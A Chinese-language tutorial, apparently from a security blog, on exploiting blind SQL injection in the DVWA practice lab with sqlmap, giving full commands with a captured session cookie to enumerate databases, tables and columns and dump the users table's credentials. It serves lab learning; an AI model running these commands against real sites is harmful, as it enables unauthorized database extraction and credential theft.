DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

DVWA下的盲注SQLmap工具注入

09-18 WEB安全

所需工具: DVWA环境、抓包工具、sqlmap
抓包工具用fiddler为例。
=====================================
先进入DVWA调整模式为LOW

DVWA下的盲注SQLmap工具注入


打开抓包工具,确定可以抓到http流量包

DVWA下的盲注SQLmap工具注入


DVWA下选择SQL盲注,随意输入一个USER ID后回车
会看到回显,用户ID存在
复制该网页链接,保存到记事本,等下sqlmap用

DVWA下的盲注SQLmap工具注入


用抓包工具获取本次提交的网页数据包里的cookie值
复制该cookie保存到记事本,等下sqlmap用

DVWA下的盲注SQLmap工具注入


打开sqlmap,查找注入点
输入命令:
-u        指定URL
--cookie     带cookie注入
python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blindid=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low"
过程中出现提示默认回车即可。
得到结果:注入点可能是ID,数据库为Mysql

DVWA下的盲注SQLmap工具注入


爆库:
--dbs     发现所有数据库 (参数前有空格)
python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low" --dbs
列出数据库:

DVWA下的盲注SQLmap工具注入


--tables     列出数据库表  (参数前有空格)
-D            选择数据库
python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low" --tables -D dvwa
查看列出的数据库表:

DVWA下的盲注SQLmap工具注入


列出users表的所有字段
–columns -T “users” (columns参数前带空格)
python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low"--columns -T users
可以看到字段

DVWA下的盲注SQLmap工具注入


把users表直接存到本地
-T users --dump
python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low" -T users --dump

DVWA下的盲注SQLmap工具注入


打开下载的文件即可看到用户名,密码

DVWA下的盲注SQLmap工具注入


最后结果:

DVWA下的盲注SQLmap工具注入

 

【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://sskjddosgb11.ddosgb.com//web/134.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 688087访问次数
  • 建站天数
  • 友情链接

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X